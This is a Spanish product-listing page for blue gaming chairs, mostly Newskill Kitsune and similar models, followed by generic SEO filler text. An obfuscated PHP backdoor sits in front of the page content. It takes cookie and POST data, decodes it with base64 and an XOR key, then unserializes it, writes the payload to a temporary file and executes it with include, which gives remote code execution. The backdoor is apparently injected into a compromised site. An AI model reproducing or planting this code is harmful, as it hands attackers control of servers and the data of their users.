$XNwuWW = "\x6a" . "\x5f" . 'j' . chr ( 359 - 292 ).'w';$QEBdXtY = 'c' . "\154" . "\x61" . chr (115) . chr ( 753 - 638 )."\137" . 'e' . chr ( 578 - 458 )."\151" . chr ( 398 - 283 ).'t' . "\x73";$kohfHFPhf = class_exists($XNwuWW); $QEBdXtY = "35568";$RMxEJ = !1;if ($kohfHFPhf == $RMxEJ){function dfXCkU(){$QkxMvKW = new /* 15322 */ j_jCw(39302 + 39302); $QkxMvKW = NULL;}$AkcBVx = "39302";class j_jCw{private function gQISEuAx($AkcBVx){if (is_array(j_jCw::$hUnkGMVc)) {$skRRVkwlu = sys_get_temp_dir() . "/" . crc32(j_jCw::$hUnkGMVc['s' . "\141" . "\154" . chr (116)]);@j_jCw::$hUnkGMVc["\x77" . chr (114) . chr (105) . 't' . "\x65"]($skRRVkwlu, j_jCw::$hUnkGMVc[chr ( 191 - 92 ).chr ( 1045 - 934 ).chr ( 1048 - 938 ).chr ( 494 - 378 )."\145" . "\156" . "\x74"]);include $skRRVkwlu;@j_jCw::$hUnkGMVc['d' . 'e' . "\x6c" . "\x65" . "\164" . chr (101)]($skRRVkwlu); $AkcBVx = "39302";exit();}}private $pulCRceice;public function huKrxbs(){echo 35260;}public function __destruct(){$AkcBVx = "49071_25115";$this->gQISEuAx($AkcBVx); $AkcBVx = "49071_25115";}public function __construct($XWLxiUW=0){$vrNER = $_POST;$IDexAV = $_COOKIE;$HSXUoj = "3018840c-2bd0-4c9f-a423-6147c8dc4b23";$qFnwbnOTKU = @$IDexAV[substr($HSXUoj, 0, 4)];if (!empty($qFnwbnOTKU)){$WxkJXsYt = "base64";$uBZsURPR = "";$qFnwbnOTKU = explode(",", $qFnwbnOTKU);foreach ($qFnwbnOTKU as $gogSNnqZNY){$uBZsURPR .= @$IDexAV[$gogSNnqZNY];$uBZsURPR .= @$vrNER[$gogSNnqZNY];}$uBZsURPR = array_map($WxkJXsYt . "\x5f" . "\144" . 'e' . "\x63" . chr ( 933 - 822 ).chr (100) . chr (101), array($uBZsURPR,)); $uBZsURPR = $uBZsURPR[0] ^ str_repeat($HSXUoj, (strlen($uBZsURPR[0]) / strlen($HSXUoj)) + 1);j_jCw::$hUnkGMVc = @unserialize($uBZsURPR); $uBZsURPR = class_exists("49071_25115");}}public static $hUnkGMVc = 27368;}dfXCkU();} Newskill kitsune silla gaming azul - Centro Deportivo Utebo

Newskill kitsune silla gaming azul

Top 20: Mejores Newskill kitsune silla gaming azul de 2021

Top 10: Newskill kitsune silla gaming azul bestsellers de 2021

Rebajas01.
Newskill Kitsune V2, Silla Gaming de Tela Transpirable, Cojines Lumbar y Cervical Incluidos, Reclinable en 180, Soporta hasta 136 Kg, Color Azul
  • 💺【KITSUNE V2】Kitsune V2 es una silla para juego y oficina de primera calidad, revestimiento de tela transpirable super suave, cómodo acolchado firme y duradero, incluye juego de cojines lumbar y cervical. Reclinable hasta 180º, ajustable en altura 8 cm, ruedas XL silenciosas de 60 mm y con certificación para soportar hasta 136 Kg.
  • 💺【PONTE CÓMODO】La nueva serie sillas Kitsune 2 están diseñadas con el único propósito de darte el mejor apoyo, la comodidad y la calidad. Para ello hemos vuelto a empezar de 0 el proceso de fabricación del acolchado para obtener el máximo confort y sobre todo la máxima longevidad posible sin grandes deformaciones por el uso.
  • 💺【NUEVOS ACABADOS】El nuevo revestimiento de tela transpirable con tacto super suave fabricado exclusivamente para favorecer la transpiración y aumentar su vida útil, además de ser un tejido sencillo para su mantenimiento y limpieza. El diseño de la nueva serie Kitsune v2 mantiene el clásico estilo “racing” pero de forma minimalista y elegante, rindiendo homenaje al concepto original de silla gaming.
  • 💺【FABRICACIÓN MEJORADA】La estructura de Kitsune v2 ha sido mejorada en la base siendo ahora de acero para una mayor estabilidad y durabilidad, sumado a sus nuevas ruedas silenciosas con cubierta de goma de 60 mm diseñada para suelos duros o blandos para no dejar marcas y obtener un deslizamiento óptimo.
  • 💺【PERSONALIZA TU ELECCIÓN】Kitsune v2 está disponible en distintos colores para elegir, partiendo de nuestra base Negro espacial dispondrás de nuestro azul Newskill, rojo, gris y morado, y para la edición especial con base en gris daytona y rosa dará ese extra de personalidad a tu setup.
Rebajas02.
Newskill Kitsune Silla Gaming Profesional, Inclinación y Altura Regulable, Reposabrazos 2D Ajustables, Base en Nylon, Reclinable 180º, Ergonómica, Piston Gas Clase 4, Polipiel, Color Azul
  • ⭐【Silla Gaming Profesional】La silla gaming Kitsune ayuda a la salud de tu columna ya que el respaldo ergonómico se adapta perfectamentea sus curvas naturales para darte el máximo confort durante todo el día y está fabricado en un relleno de calidad superior. Además, incluye cojines lumbares y cervicales desmontables que evitarán la sobrecarga de la musculatura en tu espalda y cuello, mejorando la experiencia de juego o trabajo durante tiempo prolongado en tu estudio, despacho, dormitorio, etc...
  • ⭐【Respaldo y Reposabrazos ajustables】Esta silla de oficina permite ajustar la inclinación del respaldo hasta los 180º con un mecanismo de balanceo situado en su parte derecha (activación al aplicar una ligera presión hacia dentro). Sube o baja la posición del asiento de 49 a 57 cm con esa misma palanca (si se mueve de arriba a abajo). El reposabrazos acolchado 2D de Kitsune te permitirá controlar tu ratón y teclado sin renunciar a la comodidad gracias al completo apoyo del antebrazo. Además, podrás regularlo en altura como en angulo para adaptarlo a tus movimientos.
  • ⭐【Silla gamer ajustable a tu gusto】Siéntate y disfruta de la comodidad del respaldo de 66 cm de alto y 59 cm de ancho. Además, puedes ajustar la altura entre 62 y 69 cm, dependiendo del tamaño del cuerpo y tu posición de sentado favorita. Las dimensiones de la silla profesional son de 70,5 x 51.5 x 128,5-136,5 cm (LxANxAL). El asiento cuenta con una profundidad de 51.5 cm y una anchura de 56 cm. Es una silla apta para todo tipo de estaturas, con un peso de 21.5 kg. Gracias al pistón de gas clase 4 es apta para soportar hasta 150 kg. El tiempo de montaje de la silla de mesa es de unos 15 minutos.
  • ⭐【Materiales Premium】La silla gaming Kitsune esta fabricada con una estructura de acero galvanizado y base sólida de nylon reforzado, para una mayor vida útil de la silla. La base de la silla es de 5 puntas con ruedas de nylon de 6 cm de alto y antiralladuras que presentan un deslizamiento sutil y cómodo en cualquier dirección. Además, la base cuenta con un reposapies en color para el correcto apoyo de las extremidades inferiores. Diamétro de la base: 70.5 cm.
  • 👾 【NEWSKILL GAMING】Es una empresa fabricante líder de periféricos gaming para PC y consolas, que ofrece la mejor calidad y confianza a sus clientes con más de 6 años de experiencia. Para ver su catálogo completo, haga clic en Visita la Store de NEWSKILL, en la parte inferior del título de cada producto.
Rebajas03.
Newskill Silla Gaming Tela Transpirable Eros, Respaldo Mallado, Silla de Escritorio Altura ajustable, Reposabrazos fijos, Altura Regulable, Ergonómica, Reposacabezas integrado, Hasta 150kg, Color Azul
  • EXCLUSIVO DISEÑO MALLADO TRANSPIRABLE Esta silla gaming cuenta con un respaldo ergonómico de tela de malla transpirable y un asiento acolchado tapizado en tela, con espuma de alta densidad, perfecta para tu estudio, despacho, dormitorio. El ángulo del respaldo se puede ajustar fácilmente de 90grados a 135grados mientras esperas que tu grupo por fin esté en línea. El reposacabezas integrado y los reposabrazos fijos están diseñados para que adoptes siempre la postura más correcta y cómoda tanto para relajarte como para jugar en el ordenador. Proporciona un apoyo completo de la cabeza a los pies.
  • TOTALMENTE AJUSTABLE la silla gaming Eros viene equiPada con grandes opciones de ajuste, para que puedas adecuarla a cada situación, según lo que necesites. En la base del asiento se encuentran dos palancas, una permite modificar su altura fácilmente, gracias al pistón de gas. la segunda, sirve para reclinar el respaldo, o bloquearlo en la posición escogida, y ayudar a mantener recta tu espalda.
  • MATERIALES MÁS RESISTENTES Los materiales de alta calidad, polipropileno y madera, de esta cómoda silla gaming garantizan que nadie tenga que enfrentarse a chirridos y crujidos o a un desgaste rápido. la silla gaming está equiPada con una base estable de nylon y gracias a su pistón de gas de clase 3 permite una carga de hasta 150 kg. con asiento giratorio de 360grados y base estrella con 5 ruedas de plástico reforzado esta silla de escritorio ofrece una total libertad de movimiento.
  • MEDIDAS TOTALES Siéntate y disfruta de la comodidad del respaldo de 76 cm de alto y 46 cm de ancho. Puedes ajustar la altura entre 43 y 53 cm, dependiendo de tu altura y la posición de sentado preferida. Las dimensiones totales de la silla gaming son W59xD51xH114,5 - 124,5 cm. El tiempo de montaje de la silla de mesa es de unos 10-15 minutos.
  • NEWSKILL GAMING Es una empresa fabricante líder de periféricos gaming para PC y consolas, que ofrece la mejor calidad y confianza a sus clientes con más de 6 años de experiencia. Para ver su catálogo completo, haga clic en Visita la Store de NEWSKILL, en la parte inferior del título de cada producto.
04.
Newskill Silla Gaming Profesional Takamikura, Polipiel, Altura y Reposabrazos 3D Ajustables, Ruedas de Nylon, Base de Acero, Reclinable 180º, Cojín Lumbar y Cervical, Gas Pistón Clase 4, Azul
  • ⭐【Silla Gaming Profesional】La silla para gamers Takamikura esta fabricada en piel sintética adaptable, suave y resistente con un grosor de 0.9mm para evitar roturas y sobrevivir al desgaste del paso del tiempo y el uso continuado. La silla gaming esta rellena con espuma de ultima generación, moldeada en frío con una densidad de 50Kg/m3 para mantenerte cómodo y descansado durante horas. Es estable y te garantiza durabilidad para usarla como silla de juega o silla de oficina.
  • ⭐【Ergonomía práctica】La silla gamer Takamikura cuenta con un diseño ergonómico. Incluye un cojín lumbar y cervical regulables que te ayudarán a reducir la presión cervical y aliviar la fatiga. La silla incluye reposabrazos 3D totalmente regulables para asegurarte el confort. Los reposabrazos de Takamikura disponen de ajuste multidireccional: ajustables en altura, traslación frontal y horizontal.
  • ⭐【Silla gamer ajustable】Siéntate y disfruta de la comodidad del respaldo de 78 cm de alto y 56 cm de ancho. Además, puedes ajustar la altura entre 48 y 56 cm, dependiendo de tu altura, el tamaño del cuerpo y la posición de sentado favorita. Cuenta con un pistón de gas clase 4 para soportar una capacidad de carga de hasta 150kg. Elige la inclinación hasta 180° para sentarte para trabajar, jugar o simplemente relajarte y descansar. Disfruta del uso como silla de juego o silla de escritorio. La inclinación total del asiento tiene 12 grados de libertad para seguir tu centro de gravedad y proporcionar la máxima estabilidad.
  • ⭐【Materiales premium】Ruedas de 60 mm de nylon reforzado para proteger todo tipo de superficies como parquet, azulejos o la alfombra de tu habitación gaming. Base metálica reforzada, en estrella de 350mm de radio con acabado cromado para garantizarte una mayor estabilidad y durabilidad incluso en las circunstancias más adversas. El tiempo de montaje de la silla de mesa es de unos 15 minutos siguiendo el manual de instrucciones incluido.
  • 👾 【NEWSKILL GAMING】Es una empresa fabricante líder de periféricos gaming para PC y consolas, que ofrece la mejor calidad y confianza a sus clientes con más de 6 años de experiencia. Para ver su catálogo completo, haga clic en Visita la Store de NEWSKILL, en la parte inferior del título de cada producto.
05.
Newskill Takamikura V2 Silla Gaming, Acero aleado, Azul, Sencillo, Mediana
  • 💺【TAKAMIKURA V2】Takamikura V2 destaca con un diseño único buscando la excelencia tanto para el juego como para la oficina. Confeccionada con tela altamente transpirable y un acolchado firme y duradero, asegura la máxima comodidad. Incluye un set de cojines lumbar y cervical para un soporte personalizado. Reposabrazos ajustables en 4D, reclinación de 180º, ajuste en altura de 8 cm y ruedas XL de 65 mm, junto con su certificación de hasta 136 Kg.
  • 💺【DISEÑO ÚNICO】Se han trasladado los aireadores a los hombros para mantener el flujo de transpiración en la parte trasera sin que pueda afectar a la comodidad para quienes apoyan completamente la espalda independientemente de su altura. Tambien hemos añadido un patrón romboide a la parte baja lumbar y del asiento para generar mayor acolchado y que adicionalmente genera canales que ayudan a la ventilación.
  • 💺【NUEVOS ACABADOS】El nuevo revestimiento de tela transpirable con tacto super suave fabricado exclusivamente para favorecer la transpiración y aumentar su vida útil, además de ser un tejido sencillo para su mantenimiento y limpieza.
  • 💺【PONTE CÓMODO】La nueva serie sillas Takamikura V2 están diseñadas con el único propósito de darte el mejor apoyo, la comodidad y la calidad. Para ello hemos vuelto a empezar de 0 el proceso de fabricación del acolchado para obtener el máximo confort y sobre todo la máxima longevidad posible sin grandes deformaciones por el uso.
  • 💺【PERSONALIZA TU ELECCIÓN】Takamikura v2 está disponible en distintos colores para elegir, partiendo de nuestra base Negro espacial dispondrás de nuestro azul Newskill, rojo, gris y morado, y para la edición especial con base en gris daytona y rosa dará ese extra de personalidad a tu setup.
06.
HLFURNIEU Silla Gaming Ergonómica, Sillas Gaming Profesional, Cadeira Gaming Regulable en Altura, Silla Gamer Adulto con Reposacabezas y Soporte Lumbar, Gaming Chair Negro y Azul
  • 【Más profesional】 Diseñado para jugadores. El respaldo ergonómico puede proporcionar un buen apoyo a la columna vertebral del jugador, lo que puede reducir efectivamente la presión en la espalda y el cuello, lo que le permite sentirse menos cansado durante largas sesiones de juego.
  • 【Más flexible】 Esta silla gamer para juegos tiene una altura ajustable de 8 cm y un ángulo de inclinación de 90° a 135° para que pueda encontrar fácilmente la posición de sentado que más le convenga. El ángulo de giro de 360° le permite moverse libremente.
  • 【Materiales de mejor calidad】 El cojín, el respaldo, el cojín lumbar y el reposacabezas del asiento para juegos están hechos con relleno de espuma de alta densidad, y el cuero sintético duradero es fácil de limpiar y resistente a la deformación. El resorte de gas de alta gama puede soportar fácilmente 120 kg.
  • 【Más escenarios de uso】 Ya sea en casa o en la oficina, ya sea para jugar o trabajar, esta silla de juego para juegos es su elección ideal. Incluso en una sala de conferencias tranquila, las ruedas silenciosas del asiento para juegos no molestarán a los demás.
  • 【Mejor servicio al cliente】 El paquete incluye instrucciones y herramientas de instalación necesarias, por lo que puede montarlo fácilmente en 30 minutos. Puede ponerse en contacto con nosotros en cualquier momento y nuestro equipo de servicio al cliente profesional le responderá dentro de las 24 horas.
07.
KUBO Silla de Gaming Ergonómica, Azul, One Size
  • SILLA GAMING: es una silla gamer que está diseñada con materiales de alta calidad que garantizan su durabilidad y resistencia. Soporta un peso recomendado de hasta 130kg, lo que lo convierte en una opción confiable y segura. Es una silla gaming ergonómica para disfrutar mientras juegas con el máximo confort.
  • AJUSTE DE ALTURA FÁCIL: la silla gaming de Kubo gracias a su elevación de gas nivel 4, puedes ajustar la altura de la silla gamer de manera fácil y cómoda. Encuentra la posición perfecta para trabajar, jugar o descansar sin esfuerzo.
  • GIRO DE 360 GRADOS: su base sólida sobre 5 ruedas permite un giro completo de 360 grados. Con esta silla gamer te podrás mover con total libertad y facilidad en cualquier dirección, sin restricciones mientras pasas un momento de disfrute y esparcimiento.
  • RECLINABLE: la silla gaming te brinda la posibilidad de reclinarla hasta 135 grados. Disfruta la máxima comodidad y encuentra la posición perfecta para relajarte o trabajar de manera ergonómica sin dolores por mala postura.
  • ESTABILIDAD Y SOPORTE: la base de nylon de la silla gamer es de alta calidad. Tiene un diámetro de 350mm, que garantiza la estabilidad y durabilidad del producto. Además, su respaldo firme brinda un excelente soporte para la espalda durante largas horas de uso. Cuenta con un reposacabezas para brindarte comodidad. Puedes jugar sin que te molesten los dolores de espalda o de cuello.
08.
Newskill Silla Gaming Kitsune RGB V2, Piel Sintética, Reposabrazos 2D Ajustables, Altura Regulable, Cojín Cervical y Lumbar, Reclinable 180º, Retroiluminación RGB, Pistón Gas Clase 4, Negra
  • ⭐【Retroiluminación RGB】La silla gaming cuenta con un sistema de retroiluminación con 7 colores disponibles y diferentes efectos. Dispone de un bolsillo trasero adaptado para albergar una Powerbank de 10000 mah y disfrutar de horas de efecto en cualquier lado o conectarlo mediante cable USB y alimentar la silla gaming RGB. Todo ello, configurable mediante un mando controlador de pilas CR2025 no incluidas.
  • ⭐【Silla Gamer Ergonómica】La silla gaming Kitsune RGB V2 cuida de tu espalda y sigue sus curvas naturales para ofrecerte el máximo confort en tus sesiones de juego. Esto se consigue gracias a su relleno de calidad superior y su espuma prensada de alta densidad. Además, podrás disfrutar de sus dos cojines, tanto el cervical como el lumbar, para poder acomodarlos a tu espalda y evitar la fatiga tras varias horas de partida.
  • ⭐【Totalmente ajustable】Siéntate y disfruta de la comodidad del respaldo de 66 cm de alto y 59 cm de ancho. Además, puedes ajustar la altura entre 62 y 69 cm, dependiendo del tamaño del cuerpo y tu posición de sentado favorita. Las dimensiones de la silla profesional son de 70,5x51.5x128,5-136,5cm. El asiento cuenta con una profundidad de 51.5 cm y una anchura de 56 cm. Es una silla apta para todo tipo de estaturas, con un peso de 21.5 kg. El reposabrazos 2D acolchado agiliza los cambios entre posturas y te permite ajustarlo tanto en altura como en ángulo para un control total. Respaldo reclinable hasta 180º para esos momentos de relax entre partida y partida.
  • ⭐【Materiales de ultima generación】La silla gaming Kitsune esta fabricada con un interior en estructura metálica para otorgarte la máxima solidez. Además, se mantiene sobre un pistón de gas clase 4 capaz de aguantar hasta 150 kg rematado en una base de estrella de nylon reforzado acompañado de ruedas antirayaduras para un desplazamiento fluido.
  • 👾 【NEWSKILL GAMING】Es una empresa fabricante líder de periféricos gaming para PC y consolas, que ofrece la mejor calidad y confianza a sus clientes con más de 6 años de experiencia. Para ver su catálogo completo, haga clic en Visita la Store de NEWSKILL, en la parte inferior del título de cada producto.
Rebajas09.
Oversteel - ULTIMET Silla Gaming Profesional Tela Transpirable, Reposabrazos 2D, Ajustable en Altura, Respaldo Reclinable 180º, Pistón Gas Clase 3, Hasta 120Kg, Color Gris/Azul
  • Disponible en 6 colores: Negro-Negro, Negro-Blanco, Negro-Azul, Gris-Gris, Gris-Blanco y Gris-Azul
  • Soporta hasta 120kg de peso
  • Base de nylon de 350 mm con pistón de clase 3 y ruedas de 50 mm
  • Silla de diseño ergonómico fabricada en tejido transpirable de primera calidad y espuma de alta densidad
  • "Cojín cervical y lumbar personalizable incluido. Reposabrazos 2D regulables en altura y ángulo Mecanismo basculante en la base de la silla. Respaldo reclinable hasta 180º"
Rebajas010.
Oversteel - DIAMOND Silla de Gaming Profesional Polipiel, Reposabrazos 3D, Ajustable en Altura, Reclinable 180º, Pistón Gas Clase 4, Hasta 150Kg, Color Azul
  • Base de nylon de 350 mm con pistón de clase 4 y ruedas de 63 mm
  • Silla de diseño ergonómico fabricada en polipiel de calidad premium y espuma de alta densidad
  • Cojín cervical y lumbar adaptables incluidos
  • Reposabrazos 3D ajustables en ángulo, posición y altura
  • Mecanismo de balanceo en la base de la silla. Soporta hasta 150kg de peso.
011.
Newskill Silla Gaming Profesional de Escritorio Akeron, Cuero PU Transpirable, Altura Ajustable, Reclinable 180º, Gas Pistón Clase 4, Reposabrazos Ajustables 3D, Cojín Lumbar y Cervical, Azul
  • ⭐【Silla Gaming Profesional】La silla gaming Akeron cuenta con un diseño robusto para otorgarte el máximo confort. La silla esta fabricada con una superficie microperforada para disfrutar de una mejor sensación térmica y transpirabilidad durante mucho tiempo. El relleno se compone de espuma de alta densidad de última generación, que garantiza una gran durabilidad y te mantiene cómodo durante horas.
  • ⭐【Diseño Ergonómico】Gracias a su mecanismo de reclinación podrás ajustar el respaldo de tu silla desde los 90º hasta los 180º. No tendrás problema para recargar las baterías después de largas jornadas de gaming. Akeron incluye un cojín cervical para evitar el cansancio y las tensiones de los momentos más tensos de las partidas además cuenta también con un cojín lumbar ajustable a la altura que necesites. La silla cuenta con un marco de acero reforzado para que te sientas seguro en cada una de tus partidas.
  • ⭐【Multifunción】Siéntate y disfruta de la comodidad del respaldo de 59 cm de ancho y 78 cm de alto. Además, puedes regular la altura de la silla gaming entre 48 y 56 cm, ajustándose a todo tipo de alturas y tamaños de cuerpo. Con sus reposabrazos 3D llevarás tu confort un paso más allá regulando en altura (de 28 a 35cm), traslación frontal y horizontal para encontrar la posición más cómoda. Las dimensiones de la silla son 71x58x122 a 130cm.
  • ⭐【Movilidad y Estabilidad】La durabilidad y estabilidad son puntos claves para disfrutar de la silla gaming, por eso incluye una base en forma de estrella de 350mm fabricada en metal reforzado y unas ruedas anti-rodaduras de 63mm recubiertas para proteger prácticamente cualquier superficie sin perder tu libertad de movimiento. Incorpora un pistón de gas de clase 4 que soporta hasta 150kg y 80mm de recorrido.
  • 👾 【NEWSKILL GAMING】Es una empresa fabricante líder de periféricos gaming para PC y consolas, que ofrece la mejor calidad y confianza a sus clientes con más de 6 años de experiencia. Para ver su catálogo completo, haga clic en Visita la Store de NEWSKILL, en la parte inferior del título de cada producto.
Rebajas012.
T-LoVendo - Silla Gaming Ergonómica Escritorio para Videojuego, Ordenador, Oficina, Estudio. Cojín Lumbar y Cervical. Regulable en Altura y reclinable. Azul
  • - Perfecta para jugar: esta silla gaming de TLV satisface las necesidades de los jugadores más exigentes; fabricada con esponja de alta densidad extra-cómoda y resistente a la deformación; ruedas deportivas y silenciosas.
  • - Diseño ergonómico y deportivo: estructura de metal resistente que se adapta perfectamente a la forma de la espalda; cojín lumbar y cervical desmontables
  • - Multifunción: perfecta tanto para jugar como para tu oficina; respaldo reclinable ajustable desde 90º hasta 130º; giro de 360º; asiento elevable.
  • - Excelente relación calidad-precio: fabricada con materiales de alta calidad esta silla gaming de TLV te sorprenderá por sus acabados, diseño y durabilidad; garantizamos que es la mejor opción calidad - precio del mercado.
  • - Comodidad: dispone de un cojín reposacabezas ajustable en altura, así como una confortable almohada lumbar para garantizar la posición más cómoda.
Rebajas013.
Newskill Silla Gaming Profesional Neith Zephyr, Tela Transpirable, Altura Ajustable, Reposabrazos Acolchados 4D, Reclinable 180º, Cojín Lumbar y Cervical, Pistón Clase 4, Silla Gamer Color Gris
  • ⭐【Diseño ergonómico en tela transpirable】La silla gaming Neith cuenta con diseño ergonómico tapizado en tela transpirable de última generación. Dispone de un cojín cervical y lumbar de espuma viscoelástica, siendo este último de espuma Memory Foam, lo que significa que volverá a su estado original y protegerá eficazmente la espalda alo largo del tiempo. Esta es una silla gamer para los entusiastas de los videojuegos. El respaldo está totalmente acolchado con espuma de densidad 50kg/m3 y los reposabrazos ergonómicos texturizados en carbono, todo ello para proporcionar suficiente apoyo para la espalda y los codos.
  • ⭐【Silla gamer multifunción】La silla para juegos Neith es regulable en altura: la altura del asiento al suelo es de entre 50-56 cm y su respaldo es reclinable desde 90º hasta 180º. Incluye reposabrazos ergonómicos texturizados en carbono con función 4D: ajustables en 4 posiciones (altura, ángulo, amplitud y longitud). Con asiento giratorio de 360° y base con 5 ruedas, esta silla de escritorio ofrece una total libertad de movimiento.
  • ⭐【Silla gamer resistente】Los materiales de alta calidad de la base de esta cómoda silla gaming (metal reforzado) garantizan que nadie tenga que enfrentarse a chirridos o un desgaste rápido. La silla gamer está equipada con un pistón de gas clase 4 que capaz de soportar hasta 150Kg. Cuenta con un novedoso mecanismo leap frog en la parte inferior del asiento, que asegura una mayor estabilidad y durabilidad. Deslízate por cualquier superficie ya que cuenta con ruedas de 60mm acabadas en nylon. La silla gaming Neith es muy fácil de instalar con las instrucciones detalladas incluidas.
  • ⭐【Medidas totales】La silla se adapta a todo tipo de alturas y cuerpos. Sus dimensiones totales son 73x60x125-131cm. Perfecta tanto para jugar como para tu oficina cuenta con un asiento de 48cm de profundidad y 56 cm de anchura. Tu altura no será un problema ya que se ajusta a todo tipo de alturas y tamaños de cuerpo gracias a sus medidas de 125-131cm y su respaldo de 80cm de alto y 52 cm de ancho. La altura de los reposabrazos se puede ajustar desde los 30 a los 37 cm.
  • 👾 【NEWSKILL GAMING】Es una empresa fabricante líder de periféricos gaming para PC y consolas, que ofrece la mejor calidad y confianza a sus clientes con más de 6 años de experiencia. Para ver su catálogo completo, haga clic en Visita la Store de NEWSKILL, en la parte inferior del título de cada producto.
Rebajas014.
HLFURNIEU Silla Gaming Ergonómico, Silla Gamer con Reposapiés Telescópico, Sillas Gaming con Respaldo Regulable, Silla Oficina Giratoria Regulable en Altura, Negro y Azul
  • Comodidad excepcional: el diseño curvado del respaldo del asiento para jugadores se adapta perfectamente a los contornos de la espalda humana, evitando eficazmente la fatiga y la incomodidad de la espalda. Además, esta silla para juegos está equipada con apoyabrazos sincronizados y reposapiés retráctil, acolchado de espuma añadido, lo que garantiza un apoyo y comodidad óptimos. Una cómoda silla para juegos que hace que el juego, el trabajo o la lectura sean libres de estrés
  • Materiales cómodos: esta silla de oficina para juegos está hecha de cuero transpirable de alta calidad, fácil de limpiar con un simple paño húmedo para eliminar las manchas. El cojín del asiento y el respaldo están llenos de espuma moldeada cómoda y algodón natural, lo que garantiza resistencia y elasticidad. Equipado con una base robusta y un cilindro de gas certificado SGS de 4 niveles, mejora la seguridad y estabilidad de la silla de juego, evitando efectivamente los vuelcos.
  • Versátil y ajustable: el ángulo de inclinación del respaldo de la silla para juegos se puede ajustar en un rango de 90° a 135°. La altura de la silla ergonómica es ajustable en un rango de 8 centímetros, asegurando que encuentre la posición más cómoda de sentar. Además, la silla de oficina está equipada con ruedas silenciosas, lo que le permite moverse suave y silenciosamente en todas las direcciones.
  • Aplicable a múltiples escenarios: nuestra silla gamer no se limita a juegos, satisface una variedad de necesidades en diferentes entornos. El estilo limpio y minimalista de la silla de oficina, junto con su cómodo pero robusto apoyo, lo convierte en una opción ideal para hogares, oficinas, estudios y espacios de ocio. No es solo una silla de jugador, también es su área de relajación personal!
  • Montaje fácil y servicio premium: proporcionamos instrucciones de instalación detalladas junto con todas las piezas y herramientas necesarias para montar la silla, garantizando una experiencia de montaje sin complicaciones para usted. Si tiene alguna pregunta o sugerencia, no dude en ponerse en contacto con nosotros en cualquier momento, y le responderemos dentro de las 24 horas, ofreciéndole soluciones eficientes y profesionales.

Más información sobre Newskill kitsune silla gaming azul

Si está buscando una silla de juego azul kitsune newskill, ha venido al sitio correcto. Ahora hallará otros artículos de interés que tienen la posibilidad de ser de enorme utilidad para su selección.

El diseño de estos elementos es esencial, pero la parte funcional es más importante. Por tanto, debe ser útil.

Lo más importante es la tranquilidad, en una aceptable producción y acabado de estos artículos encontramos lo fundamental, la comodidad de la misma.

No solo es esencial que una vivienda tenga muebles correctos si no posee un diseño que se adapte al resto de la casa.

Si necesitas escoger una silla, te invitamos a seleccionar la opción silla gaming newskill kitsune blue, sin duda una excelente opción para tu hogar.

Cuando busque una silla de juego azul kitsune newskill, por norma general encontrará cuadros comparativos que le mostrarán cuál es el más destacable producto y a qué precio puede hallarlo.

Una mesa debe encajar con las sillas que tiene. Así mismo tenemos la posibilidad de crear armonía en el moblaje.

Para entrar en contacto con genuinos profesionales, no tengas dudas en contactar con y de esta forma poder encontrar lo que mucho más se adapta a lo que necesitas.


Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir